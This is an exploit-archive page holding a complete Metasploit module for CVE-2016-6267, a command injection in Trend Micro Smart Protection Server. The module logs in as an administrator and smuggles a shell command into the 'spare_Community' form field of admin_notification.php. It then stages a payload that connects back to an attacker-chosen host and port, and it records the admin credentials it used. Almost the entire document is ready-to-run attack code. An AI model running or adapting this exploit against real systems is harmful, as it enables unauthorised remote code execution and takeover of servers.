Trend Micro Smart Protection Server Exec Remote Code Injection



EKU-ID: 6044 CVE: 2016-6267 OSVDB-ID:
Author: Quentin Kaiser Published: 2016-11-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'openssl'
require 'base64'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Trend Micro Smart Protection Server Exec Remote Code Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection.
        Please note: authentication is required to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
        ],
      'References'     =>
        [
          ['CVE-ID', 'CVE-2016-6267']
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => { 'BadChars' => "\x00" },
      'CmdStagerFlavor' => [ 'bourne' ],
      'Privileged'     => false,
      'DefaultOptions' =>
      {
         'SSL' => true
      },
      'DisclosureDate' => "Aug 8 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address]),
        OptPort.new('LPORT', [true, "The port SPS will connect back to ", 4444 ]),
        OptString.new('ADMINACCOUNT', [true, 'Name of the SPS admin account', 'admin']),
        OptString.new('ADMINPASS', [true, 'Password of the SPS admin account', 'admin']),
      ], self.class)
  end


  def check
    opts = login
    if opts
      uri = target_uri.path
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, "php/about.php?sid=#{opts['sid']}"),
        'headers'=>
        {
          'Cookie' => "#{opts["sid"]}=#{opts["sid_value"]}",
          'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
          'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
        }
      })
      if res and res.code == 200
        version = res.body.to_s.scan(/MSG_ABOUT_VERSION <\/td>[^<]*<td[^>]*>([^<]*)</).last.first.to_f
        build = res.body.to_s.scan(/MSG_ABOUT_BUILD <\/td>[^<]*<td[^>]*><span[^>]*>([^<]*)</).last.first.to_i(10)
        print_status("TrendMicro Smart Protection Server detected.")
        print_status("Version: #{version}")
        print_status("Build: #{build}")
        if (version == 3.0 and build < 1330) or
          (version == 2.6 and build < 2106) or
          (version == 2.5 and build < 2200)
            return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
    end
    Exploit::CheckCode::Unknown
  end


  def execute_command(cmd, opts = {})
    uri = target_uri.path
    send_request_cgi({
      'method' => 'POST',
      'version' => '1.0',
      'timeout' => 1,
      'uri' => normalize_uri(uri, 'php/admin_notification.php'),
      'ctype' => 'application/x-www-form-urlencoded',
      'headers'=>
      {
        'Cookie' => "#{opts["sid"]}=#{opts["sid_value"]}",
        'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
        'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
      },
      'vars_post' => {
        'EnableSNMP' => 'on',
        'Community' => 'hello',
        'submit' => 'Save',
        'pubkey' => '',
        'spare_EnableSNMP' => 1,
        'spare_Community' => "test;#{cmd}",
        'spare_EnableIPRestriction' => 0,
        'spare_AllowGroupIP' => '',
        'spare_AllowGroupNetmask' => '',
        'sid' => opts["sid"]
      }
    })
  end

  def login
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'index.php'),
    })
    if res and res.code == 200 and !res.get_cookies.empty?
      sid = res.get_cookies.scan(/([^=]*)=[^;]*;/).last.first.strip
      sid_value = res.get_cookies.scan(/#{sid}=([a-z0-9]+);/).last.first
      n = res.body.to_s.scan(/name="pubkey" value="([^"]*)"/).last.first
      nonce = res.body.to_s.scan(/name="nonce" value="([^"]*)"/).last.first
      asn1_sequence = OpenSSL::ASN1::Sequence.new(
        [
          OpenSSL::ASN1::Integer.new("0x#{n}".to_i(16)),
          OpenSSL::ASN1::Integer.new("0x10001".to_i(16))
        ]
      )
      public_key = OpenSSL::PKey::RSA.new(asn1_sequence)
      creds = "#{datastore['ADMINACCOUNT']}\t#{datastore['ADMINPASS']}\t#{nonce}"
      data = Base64.encode64(public_key.public_encrypt(creds))
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(uri, "auth.php"),
        'ctype' => 'application/x-www-form-urlencoded',
        'headers'=>
        {
          'Cookie' => "#{sid}=#{sid_value}",
          'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
          'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
        },
        'vars_post' => {
          'data' => data,
          'sid' => sid
        }
      })
      if res and res.code == 302
        if res.headers.key?('Set-Cookie')
          sid = res.get_cookies.scan(/([^=]*)=[^;]*;/).last.first
          sid_value = res.get_cookies.scan(/#{sid}=([^;]*);/).last.first
        end
        report_cred(
            ip: datastore['RHOST'],
            port: datastore['RPORT'],
            service_name: (ssl ? "https" : "http"),
            user: datastore['ADMINACCOUNT'],
            password: datastore['ADMINPASS'],
            proof: "#{sid}=#{sid_value}"
        )
        return {"sid" => sid, "sid_value" => sid_value}
      end
    end
    nil
  end

  def report_cred(opts)
    service_data = {
        address: opts[:ip],
        port: opts[:port],
        service_name: opts[:service_name],
        protocol: 'tcp',
        workspace_id: myworkspace_id
    }

    credential_data = {
        origin_type: :service,
        module_fullname: fullname,
        username: opts[:user],
        private_data: opts[:password],
        private_type: :password
    }.merge(service_data)

    login_data = {
        core: create_credential(credential_data),
        status: Metasploit::Model::Login::Status::SUCCESSFUL,
        proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def exploit
    opts = login
    if opts
      print_status("Successfully logged in.")
      print_status("Exploiting...")
      execute_cmdstager(opts=opts)
    else
      print_error("An error occured while loggin in.")
    end
  end
end